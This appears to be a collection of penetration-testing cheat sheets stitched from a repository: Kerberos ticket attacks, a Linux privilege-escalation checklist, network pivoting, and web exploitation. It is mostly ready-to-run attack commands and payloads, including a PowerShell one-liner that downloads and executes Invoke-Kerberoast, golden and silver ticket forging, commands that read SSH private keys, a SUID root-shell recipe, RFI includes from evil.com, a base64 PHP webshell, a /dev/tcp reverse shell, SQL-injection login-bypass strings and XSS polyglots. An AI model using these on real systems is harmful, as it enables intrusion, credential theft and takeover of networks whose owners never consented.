With **Powershell** (this loads an unpinned script from a GitHub branch straight into IEX; pin a commit or host a reviewed copy):
```
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
```

Cracking with dictionary of passwords:
```shell
hashcat -m 13100 --force <TGSs_file> <passwords_file>

john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>
```


## Overpass The Hash/Pass The Key (PTK)

By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
```shell
# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (AES is the default etype on current domains, so an AES request is probably less conspicuous than an RC4 one)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]
# If not provided, password is asked

# Set the TGT for impacket use
export 
KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
# (-k makes impacket use the ccache; the target has to be a hostname that matches the service SPN, not an IP)
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```


With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
```shell
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```



## Pass The Ticket (PTT)

### Harvest tickets from Linux

Check type and location of tickets:

```shell
grep default_ccache_name /etc/krb5.conf
```
If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}.

In case of file tickets, you can copy them (if you have permissions) and use them as-is.

In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```shell
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a folder reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i
```

### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz) (reads LSASS, so this needs an elevated context):
```shell
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell (only the current user's tickets unless elevated):
```shell
.\Rubeus.exe dump

# After dump with Rubeus tickets in base64, to write them in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))
```


To convert tickets between Linux/Windows format with [ticket_converter.py](https://github.com/Zer1t0/ticket_converter):

```
python ticket_converter.py ticket.kirbi ticket.ccache
python 
ticket_converter.py ticket.ccache ticket.kirbi 149 | ``` 150 | 151 | ### Using ticket in Linux: 152 | 153 | With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: 154 | ```shell 155 | # Set the ticket for impacket use 156 | export KRB5CCNAME= 157 | 158 | # Execute remote commands with any of the following by using the TGT 159 | python psexec.py /@ -k -no-pass 160 | python smbexec.py /@ -k -no-pass 161 | python wmiexec.py /@ -k -no-pass 162 | ``` 163 | 164 | 165 | ### Using ticket in Windows 166 | 167 | Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz): 168 | ```shell 169 | mimikatz # kerberos::ptt 170 | ``` 171 | 172 | Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): 173 | ```shell 174 | .\Rubeus.exe ptt /ticket: 175 | ``` 176 | 177 | Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): 178 | ```shell 179 | .\PsExec.exe -accepteula \\ cmd 180 | ``` 181 | 182 | ## Silver ticket 183 | 184 | With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: 185 | ```shell 186 | # To generate the TGS with NTLM 187 | python ticketer.py -nthash -domain-sid -domain -spn 188 | 189 | # To generate the TGS with AES key 190 | python ticketer.py -aesKey -domain-sid -domain -spn 191 | 192 | # Set the ticket for impacket use 193 | export KRB5CCNAME= 194 | 195 | # Execute remote commands with any of the following by using the TGT 196 | python psexec.py /@ -k -no-pass 197 | python smbexec.py /@ -k -no-pass 198 | python wmiexec.py /@ -k -no-pass 199 | ``` 200 | 201 | With [Mimikatz](https://github.com/gentilkiwi/mimikatz): 202 | ```shell 203 | # To generate the TGS with NTLM 204 | mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target: 205 | 206 | # To generate the TGS with AES 128 key 207 | mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target: 208 | 209 | # To generate the TGS with AES 256 key (more secure encryption, 
probably stealthier, since it is what Microsoft uses by default) 210 | mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target: 211 | 212 | # Inject TGS with Mimikatz 213 | mimikatz # kerberos::ptt 214 | ``` 215 | 216 | Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): 217 | ```shell 218 | .\Rubeus.exe ptt /ticket: 219 | ``` 220 | 221 | Execute a cmd on the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): 222 | ```shell 223 | .\PsExec.exe -accepteula \\ cmd 224 | ``` 225 | 226 | ## Golden ticket 227 | 228 | With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: 229 | ```shell 230 | # To generate the TGT with NTLM 231 | python ticketer.py -nthash -domain-sid -domain 232 | 233 | # To generate the TGT with AES key 234 | python ticketer.py -aesKey -domain-sid -domain 235 | 236 | # Set the ticket for impacket use 237 | export KRB5CCNAME= 238 | 239 | # Execute remote commands with any of the following by using the TGT 240 | python psexec.py /@ -k -no-pass 241 | python smbexec.py /@ -k -no-pass 242 | python wmiexec.py /@ -k -no-pass 243 | ``` 244 | 245 | 246 | With [Mimikatz](https://github.com/gentilkiwi/mimikatz): 247 | ```shell 248 | # To generate the TGT with NTLM 249 | mimikatz # kerberos::golden /domain:/sid: /rc4: /user: 250 | 251 | # To generate the TGT with AES 128 key 252 | mimikatz # kerberos::golden /domain:/sid: /aes128: /user: 253 | 254 | # To generate the TGT with AES 256 key (more secure encryption, probably stealthier, since it is what Microsoft uses by default) 255 | mimikatz # kerberos::golden /domain:/sid: /aes256: /user: 256 | 257 | # Inject TGT with Mimikatz 258 | mimikatz # kerberos::ptt 259 | ``` 260 | 261 | Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): 262 | ```shell 263 | .\Rubeus.exe ptt /ticket: 264 | ``` 265 | 266 | Execute a cmd on the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): 267 
| ```shell 268 | .\PsExec.exe -accepteula \\ cmd 269 | ``` 270 | 271 | ## Misc 272 | 273 | To get NTLM from password: 274 | ```python 275 | python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "".encode("utf-16le")).digest())' 276 | ``` 277 | 278 | ## Tools 279 | 280 | * [Impacket](https://github.com/SecureAuthCorp/impacket) 281 | * [Mimikatz](https://github.com/gentilkiwi/mimikatz) 282 | * [Rubeus](https://github.com/GhostPack/Rubeus) 283 | * [Rubeus](https://github.com/Zer1t0/Rubeus) with brute module 284 | * [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) 285 | * [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute) 286 | * [tickey](https://github.com/TarlogicSecurity/tickey) 287 | * [ticket_converter.py](https://github.com/Zer1t0/ticket_converter) 288 | -------------------------------------------------------------------------------- /linux-privesc.md: -------------------------------------------------------------------------------- 1 | A checklist for linux privesc. Might be missing lots of things. Is mostly taken from https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 2 | 3 | Do you have a decent shell? 4 | ```bash 5 | python -c 'import pty;pty.spawn("/bin/bash")' 6 | python3 -c 'import pty;pty.spawn("/bin/bash")' 7 | echo os.system('/bin/bash') 8 | /bin/sh -i 9 | ``` 10 | To get tab completion working 11 | ```bash 12 | ctrl+z 13 | echo $TERM && tput lines && tput cols 14 | 15 | stty raw -echo 16 | fg 17 | 18 | reset 19 | export SHELL=bash 20 | export TERM=xterm-256color (screen when running tmux) 21 | stty rows columns 22 | ``` 23 | Or use Socat for a full reverse tty 24 | ```bash 25 | socat file:`tty`,raw,echo=0 tcp-listen:12345 26 | ``` 27 | 28 | 29 | ### Initial Recon 30 | Start by checking the version and distro of the machine for possible kernel exploits, and also the sudo permissions of whatever account you have if possible. 
31 | ```bash 32 | lsb_release -a && uname -a 33 | cat /etc/issue 34 | cat /etc/*-release 35 | cat /proc/version 36 | sudo -l 37 | ``` 38 | To do things quickly, run the LinEnum script from Rebootuser. 39 | 40 | https://github.com/rebootuser/LinEnum 41 | 42 | Check for plaintext passwords with it 43 | ```bash 44 | ./LinEnum.sh -t -k password 45 | ``` 46 | What users have shells on the box? 47 | ```bash 48 | grep -vE "nologin|false" /etc/passwd 49 | ``` 50 | Anything in users' home directories or mail? 51 | ```bash 52 | ls -ahlR /root/ 53 | ls -ahlR /home/ 54 | cat ~/.bash_history 55 | cat ~/.nano_history 56 | cat ~/.atftp_history 57 | cat ~/.mysql_history 58 | cat ~/.php_history 59 | cat ~/.bashrc 60 | cat ~/.profile 61 | cat /var/mail/root 62 | cat /var/spool/mail/root 63 | ``` 64 | 65 | Anything else in the environment variables? symlinks? 66 | ```bash 67 | cat /etc/profile 68 | cat /etc/bashrc 69 | cat ~/.bash_profile 70 | cat ~/.bash_logout 71 | env 72 | set 73 | find / -type l -ls 74 | ``` 75 | Anything going on with the network? hidden services? logged-in users? 76 | ```bash 77 | /sbin/ifconfig -a 78 | cat /etc/network/interfaces 79 | cat /etc/sysconfig/network 80 | lsof -i 81 | lsof -i :80 82 | grep 80 /etc/services 83 | netstat -antup 84 | netstat -antpx 85 | netstat -tulpn 86 | chkconfig --list 87 | chkconfig --list | grep 3:on 88 | last 89 | w 90 | arp -a 91 | ``` 92 | 93 | Can you sniff traffic? 94 | ```bash 95 | tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21 96 | ``` 97 | 98 | 99 | 100 | ### SUID Files, Root Services, and Other Files 101 | 102 | Check for things running as root 103 | ```bash 104 | ps aux | grep root 105 | ps -ef | grep root 106 | ``` 107 | Check the version of something that's installed 108 | ```bash 109 | dpkg -l | grep -i PAM 110 | ``` 111 | Any file-systems mounted or unmounted? 112 | ```bash 113 | mount 114 | df -h 115 | cat /etc/fstab 116 | ``` 117 | Then check SUID/SGID and other interesting files. 
118 | ```bash 119 | find / -perm -4000 -exec ls -al -print 2>/dev/null {} \; 120 | find / -uid 0 -perm -4000 2>/dev/null 121 | ``` 122 | To create our own SUID binary 123 | ```bash 124 | print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c 125 | gcc -o /tmp/suid /tmp/suid.c 126 | sudo chmod +x /tmp/suid 127 | sudo chmod +s /tmp/suid 128 | ``` 129 | 130 | SGID (chmod 2000) - run as the group, not the user who started it. 131 | ```bash 132 | find / -perm -g=s -type f 2>/dev/null 133 | ``` 134 | SUID (chmod 4000) - run as the owner, not the user who started it. 135 | ```bash 136 | find / -perm -u=s -type f 2>/dev/null 137 | ``` 138 | Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. 139 | 140 | ```bash 141 | find / -perm -1000 -type d 2>/dev/null 142 | ``` 143 | 144 | Are any folders or files world writeable and executable? 145 | ```bash 146 | find / \( -perm -o w -perm -o x \) -type d 2>/dev/null 147 | find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 148 | ``` 149 | Anything modified recently? To check for executables updated in August 150 | ```bash 151 | find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug 152 | ``` 153 | To find anything modified in the last 10 minutes 154 | ```bash 155 | find / -mmin -10 -type f 2>/dev/null 156 | ``` 157 | Any writeable configuration files? 158 | ```bash 159 | find /etc/ -writable -type f 2>/dev/null 160 | ``` 161 | Or any files containing 'config' 162 | ```bash 163 | find . -iname '*config*' 164 | ``` 165 | To find a specific file 166 | ```bash 167 | find . -name suid* 168 | ``` 169 | Files with passwords? 170 | ```bash 171 | grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null 172 | find . 
-type f -exec grep -i -I "PASSWORD" {} /dev/null \; 173 | ``` 174 | Find .conf files (recursive 4 levels) and output the line number where the word 'password' is located 175 | ```bash 176 | find / -maxdepth 7 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/null 177 | ``` 178 | 179 | Or other sensitive files 180 | ```bash 181 | $ locate password | more 182 | /boot/grub/i386-pc/password.mod 183 | /etc/pam.d/common-password 184 | /etc/pam.d/gdm-password 185 | /etc/pam.d/gdm-password.original 186 | /lib/live/config/0031-root-password 187 | ``` 188 | 189 | Find all perl files owned by rootme in /var/www 190 | ```bash 191 | find /var/www -user rootme -name "*.pl" 192 | ``` 193 | 194 | Scan for a string in all files in a directory 195 | ```bash 196 | du . | awk '{print $2}'| grep -rnw "string" --color 197 | ``` 198 | 199 | Find password strings in memory 200 | ```bash 201 | strings /dev/mem -n10 | grep -i PASS 202 | ``` 203 | 204 | ### Cron 205 | Look through these 206 | ```bash 207 | crontab -l 208 | ls -alh /var/spool/cron 209 | ls -al /etc/ | grep cron 210 | ls -al /etc/cron* 211 | cat /etc/cron* 212 | cat /etc/at.allow 213 | cat /etc/at.deny 214 | cat /etc/cron.allow 215 | cat /etc/cron.deny 216 | cat /etc/crontab 217 | cat /etc/anacrontab 218 | cat /var/spool/cron/crontabs/root 219 | ``` 220 | This might not work, but the for loop will list the crontabs for each user. 221 | ```bash 222 | for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done 223 | ``` 224 | This is a nice script from ihack4falafel to monitor cron and echo new processes 225 | 226 | https://github.com/ihack4falafel/OSCP/blob/master/BASH/CronJobChecker.sh 227 | 228 | ### Keys and Database Passwords 229 | 230 | Any private keys saved elsewhere? 
231 | ```bash 232 | cat ~/.ssh/authorized_keys 233 | cat ~/.ssh/identity.pub 234 | cat ~/.ssh/identity 235 | cat ~/.ssh/id_rsa.pub 236 | cat ~/.ssh/id_rsa 237 | cat ~/.ssh/id_dsa.pub 238 | cat ~/.ssh/id_dsa 239 | cat /etc/ssh/ssh_config 240 | cat /etc/ssh/sshd_config 241 | cat /etc/ssh/ssh\_host\_dsa_key.pub 242 | cat /etc/ssh/ssh\_host\_dsa_key 243 | cat /etc/ssh/ssh\_host\_rsa_key.pub 244 | cat /etc/ssh/ssh\_host\_rsa_key 245 | cat /etc/ssh/ssh\_host\_key.pub 246 | cat /etc/ssh/ssh\_host\_key 247 | ``` 248 | Whats in var? 249 | ```bash 250 | ls -alh /var/log 251 | ls -alh /var/mail 252 | ls -alh /var/spool 253 | ls -alh /var/spool/lpd 254 | ls -alh /var/lib/pgsql 255 | ls -alh /var/lib/mysql 256 | cat /var/lib/dhcp3/dhclient.leases 257 | ``` 258 | Any files with database information? 259 | ```bash 260 | ls -alhR /var/www/ 261 | ls -alhR /srv/www/htdocs/ 262 | ls -alhR /usr/local/www/apache22/data/ 263 | ls -alhR /opt/lampp/htdocs/ 264 | ls -alhR /var/www/html/ 265 | ``` 266 | Default locations sometimes for good things 267 | ```bash 268 | cat /var/apache2/config.inc 269 | cat /var/lib/mysql/mysql/user.MYD 270 | cat /root/anaconda-ks.cfg 271 | ``` 272 | 273 | 274 | ### References 275 | 276 | https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 277 | 278 | https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/ 279 | 280 | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA 281 | 282 | https://bitvijays.github.io/LFC-VulnerableMachines.html#linux-privilege-escalation 283 | 284 | https://github.com/lucyoa/kernel-exploits 285 | 286 | https://github.com/SecWiki/linux-kernel-exploits 287 | 288 | 289 | 290 | -------------------------------------------------------------------------------- /pivoting.md: -------------------------------------------------------------------------------- 1 | # Port Forwarding Examples 2 | 3 | 4 | ## [Chisel](https://github.com/jpillora/chisel) 5 | First start the server on our machine. 
6 | ```bash 7 | chisel server -p 8000 --reverse 8 | ``` 9 | And then from our victim. 10 | ```bash 11 | ./chisel client 10.10.10.3:8000 R:socks 12 | ``` 13 | Our machine now has a listener on port 1080, which is a SOCKS5 proxy through the chisel client. 14 | 15 | ## [Ligolo](https://github.com/sysdream/ligolo) 16 | On your attack server. 17 | ```bash 18 | ./bin/localrelay_linux_amd64 19 | ``` 20 | On the compromised host. 21 | ```bash 22 | > ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555 23 | ``` 24 | Once the connection is established, set the following parameters in the ProxyChains config file (on the attack server): 25 | ```bash 26 | [ProxyList] 27 | # add proxy here ... 28 | # meanwile 29 | # defaults set to "tor" 30 | socks5 127.0.0.1 1080 31 | ``` 32 | Profit. 33 | ```bash 34 | $ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A 35 | $ proxychains rdesktop 10.0.0.123 36 | ``` 37 | ## SSH dynamic port forward 38 | 39 | ```bash 40 | ssh -D8080 [user]@[host] 41 | 42 | ssh -N -f -D 9000 [user]@[host] 43 | -f : ssh in background 44 | -N : do not execute a remote command 45 | ``` 46 | ## SSH double pivots from one network to another 47 | SOCKS proxy over two hops into an internal network. 48 | ```bash 49 | ssh -D 127.0.0.1:1080 -p 22 user1@IP1 50 | Add socks4 127.0.0.1 1080 in /etc/proxychains.conf 51 | proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2 52 | Add socks4 127.0.0.1 1081 in /etc/proxychains.conf 53 | proxychains commands target 54 | ``` 55 | ## SSH remote port forwarding 56 | Forward a single port on the remote machine to a port on our box. 
57 | ```bash 58 | ssh -R 9000:localhost:8001 username@hostname 59 | ssh -R 2222:localhost:22 username@hostname - SSH 60 | ssh -R 2223:localhost:5902 username@hostname - VNC 61 | autossh -M 20000 -f -R 2222:localhost:80 username@hostname 62 | ``` 63 | ## [SShuttle](https://sshuttle.readthedocs.io/en/stable/usage.html) 64 | 65 | To sshuttle into an internal network and forward all traffic: 66 | ```bash 67 | sshuttle -r user@10.10.10.10 10.1.1.0/24 -vNH -e 'ssh -i id_rsa' 68 | ``` 69 | 70 | ## Windows netsh 71 | 72 | ```powershell 73 | netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport 74 | 75 | netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 76 | ``` 77 | 78 | ## Plink 79 | 80 | ```powershell 81 | plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server 82 | plink -l root -pw mypassword 192.168.18.84 -R 83 | plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] 84 | ``` 85 | 86 | ## [Meterpreter portfwd](https://www.offensive-security.com/metasploit-unleashed/portfwd/) 87 | Forward remote port to local address. 
88 | ```bash 89 | meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141 90 | kali > rdesktop 127.0.0.1:3389 91 | 92 | or 93 | 94 | portfwd list 95 | portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 96 | 97 | or 98 | 99 | run autoroute -s 192.168.57.0/24 100 | use auxiliary/server/socks4a 101 | ``` 102 | 103 | ## References 104 | https://chryzsh.gitbooks.io/pentestbook/content/port_forwarding_and_tunneling.html 105 | 106 | https://blog.ropnop.com/ 107 | 108 | https://www.toshellandback.com/2017/02/11/psexec/ 109 | 110 | https://blog.ropnop.com/practical-usage-of-ntlm-hashes/ 111 | -------------------------------------------------------------------------------- /web.md: -------------------------------------------------------------------------------- 1 | ## Basic LFI 2 | Thanks to https://github.com/swisskyrepo/PayloadsAllTheThings 3 | 4 | ``` 5 | http://example.com/index.php?page=../../../etc/passwd 6 | ``` 7 | 8 | ### Null byte 9 | 10 | ``` 11 | http://example.com/index.php?page=../../../etc/passwd%00 12 | ``` 13 | 14 | ### Double encoding 15 | 16 | ``` 17 | http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd 18 | http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 19 | ``` 20 | 21 | ### Path and dot truncation 22 | 23 | On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. 
24 | 25 | ``` 26 | http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] 27 | http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] 28 | http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 29 | http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd 30 | ``` 31 | 32 | ### Filter bypass tricks 33 | 34 | ``` 35 | http://example.com/index.php?page=....//....//etc/passwd 36 | http://example.com/index.php?page=..///////..////..//////etc/passwd 37 | http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd 38 | ``` 39 | 40 | ## Basic RFI 41 | 42 | Most of the filter bypasses from LFI section can be reused for RFI. 43 | 44 | ``` 45 | http://example.com/index.php?page=http://evil.com/shell.txt 46 | ``` 47 | 48 | ### Null byte 49 | 50 | ``` 51 | http://example.com/index.php?page=http://evil.com/shell.txt%00 52 | ``` 53 | 54 | ### Double encoding 55 | 56 | ``` 57 | http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt 58 | ``` 59 | 60 | ### Bypass allow_url_include 61 | 62 | When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. 63 | 64 | 1. Create a share open to everyone 65 | 2. Write a PHP code inside a file : `shell.php` 66 | 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` 67 | 68 | 69 | ## LFI / RFI using wrappers 70 | 71 | ### Wrapper php://filter 72 | 73 | The part "php://filter" is case insensitive 74 | 75 | ``` 76 | http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php 77 | http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php 78 | http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php 79 | ``` 80 | 81 | can be chained with a compression wrapper for large files. 
82 | 83 | ``` 84 | http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd 85 | ``` 86 | 87 | NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` 88 | 89 | 90 | ### LFI Wrapper ZIP 91 | ``` 92 | echo "
" > payload.php; 93 | zip payload.zip payload.php; 94 | mv payload.zip shell.jpg; 95 | rm payload.php 96 | 97 | http://example.com/index.php?page=zip://shell.jpg%23payload.php 98 | ``` 99 | 100 | ### RFI Wrapper DATA with "" payload 101 | ``` 102 | http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAh 103 | ``` 104 | 105 | ### Wrapper expect:// 106 | 107 | ``` 108 | http://example.com/index.php?page=expect://id 109 | http://example.com/index.php?page=expect://ls 110 | ``` 111 | 112 | ### Wrapper input:// 113 | 114 | Specify your payload in the POST parameters 115 | 116 | ``` 117 | http://example.com/index.php?page=php://input 118 | POST DATA: 119 | ``` 120 | 121 | ### LFI to RCE via /proc/self/environ 122 | 123 | Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file 124 | 125 | ``` 126 | GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 127 | User-Agent: 128 | ``` 129 | 130 | ### Logfile Injection 131 | Don't forget maybe you can connect to the server and write code into the logfiles. This may also work with emails if you can view them. 
132 | ``` 133 | nc 134 | GET / HTTP/1.1 135 | Host: 136 | Connection: close 137 | ``` 138 | 139 | Afterwards include the it via LFI: 140 | ```?lfi_file=/var/log/apache2/access.log&cmd=``` 141 | 142 | Example log files to try: 143 | ``` 144 | http://example.com/index.php?page=/var/log/apache/access.log 145 | http://example.com/index.php?page=/var/log/apache/error.log 146 | http://example.com/index.php?page=/var/log/vsftpd.log 147 | http://example.com/index.php?page=/var/log/sshd.log 148 | http://example.com/index.php?page=/var/log/mail 149 | http://example.com/index.php?page=/var/log/httpd/error_log 150 | http://example.com/index.php?page=/usr/local/apache/log/error_log 151 | http://example.com/index.php?page=/usr/local/apache2/log/error_log 152 | ``` 153 | 154 | ### More shell examples and snippets 155 | Evil.txt example to use with any RFI 156 | ``` 157 | 158 | 159 | # Or just get a reverse shell directly like this: 160 | /dev/tcp/10.10.14.22/443; sh <&196 >&196 2>&196"); ?> 161 | ``` 162 | Base64 163 | ``` 164 | 165 | ``` 166 | Other ways to make a shell 167 | ``` 168 | 169 | 170 | ``` 171 | If you use REQUEST, you can use the GET and POST parameter: 172 | ``` 173 | 174 | ``` 175 | ``` 176 | curl -X PUT -d ' 178 |
179 | 180 | ``` 181 | 182 | 183 | A good overview of all this https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ 184 | 185 | list of possible Apache directories: http://wiki.apache.org/httpd/DistrosDefaultLayout 186 | 187 | include access log from file descriptor /proc/self/fd/XX: http://pastebin.com/raw.php?i=cRYvK4jb 188 | 189 | include email log files: http://devels-playground.blogspot.de/2007/08/local-file-inclusion-tricks.html 190 | 191 | include session files: https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/ 192 | 193 | include PHP’s temporarily uploaded files http://gynvael.coldwind.pl/?id=376 194 | 195 | 196 | ## MySQL stuff 197 | 198 | ### Classic authentication bypass strings 199 | ``` 200 | '-' 201 | ' ' 202 | '&' 203 | '^' 204 | '*' 205 | ' or ''-' 206 | ' or '' ' 207 | ' or ''&' 208 | ' or ''^' 209 | ' or ''*' 210 | "-" 211 | " " 212 | "&" 213 | "^" 214 | "*" 215 | " or ""-" 216 | " or "" " 217 | " or ""&" 218 | " or ""^" 219 | " or ""*" 220 | or true-- 221 | " or true-- 222 | ' or true-- 223 | ") or true-- 224 | ') or true-- 225 | ' or 'x'='x 226 | ') or ('x')=('x 227 | ')) or (('x'))=(('x 228 | " or "x"="x 229 | ") or ("x")=("x 230 | ")) or (("x"))=(("x 231 | '-- - 232 | '-- -# 233 | admin' -- 234 | admin' # 235 | admin'/* 236 | admin' or '1'='1 237 | admin' or '1'='1'-- 238 | admin' or '1'='1'# 239 | admin' or '1'='1'/* 240 | admin'or 1=1 or ''=' 241 | admin' or 1=1 242 | admin' or 1=1-- 243 | admin' or 1=1# 244 | admin' or 1=1/* 245 | admin') or ('1'='1 246 | admin') or ('1'='1'-- 247 | admin') or ('1'='1'# 248 | admin') or ('1'='1'/* 249 | admin') or '1'='1 250 | admin') or '1'='1'-- 251 | admin') or '1'='1'# 252 | admin') or '1'='1'/* 253 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 254 | admin" -- 255 | admin" # 256 | admin"/* 257 | admin" or "1"="1 258 | admin" or "1"="1"-- 259 | admin" or "1"="1"# 260 | admin" or "1"="1"/* 261 | admin"or 1=1 or ""=" 262 | 
admin" or 1=1 263 | admin" or 1=1-- 264 | admin" or 1=1# 265 | admin" or 1=1/* 266 | admin") or ("1"="1 267 | admin") or ("1"="1"-- 268 | admin") or ("1"="1"# 269 | admin") or ("1"="1"/* 270 | admin") or "1"="1 271 | admin") or "1"="1"-- 272 | admin") or "1"="1"# 273 | admin") or "1"="1"/* 274 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 275 | ``` 276 | ### SQLi 277 | Check if you can find a row, where you can place your output 278 | ```http://ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8``` 279 | 280 | Get the version of the database 281 | ```http://ip/inj.php?id=1 union all select 1,2,3,@@version,5``` 282 | 283 | Get the current user 284 | ```http://ip/inj.php?id=1 union all select 1,2,3,user(),5``` 285 | 286 | See all tables 287 | ```http://ip/inj.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables``` 288 | 289 | Get column names for a specified table 290 | ```http://ip/inj.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'``` 291 | 292 | Concat user names and passwords (0x3a represents “:”) 293 | ```http://ip/inj.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users``` 294 | 295 | Write into a file 296 | ```http://ip/inj.php?id=1 union all select 1,2,3,"content",5 into OUTFILE 'outfile'``` 297 | 298 | 299 | ## XSS Polyglots 300 | 301 | Polyglot XSS - 0xsobky 302 | 303 | ```javascript 304 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e 305 | ``` 306 | 307 | Polyglot XSS - Ashar Javed 308 | 309 | ```javascript 310 | ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 311 | ``` 312 | 313 | Polyglot XSS - Mathias Karlsson 314 | 315 | ```javascript 316 | " onclick=alert(1)//<button ‘ onclick=alert(1)//> 
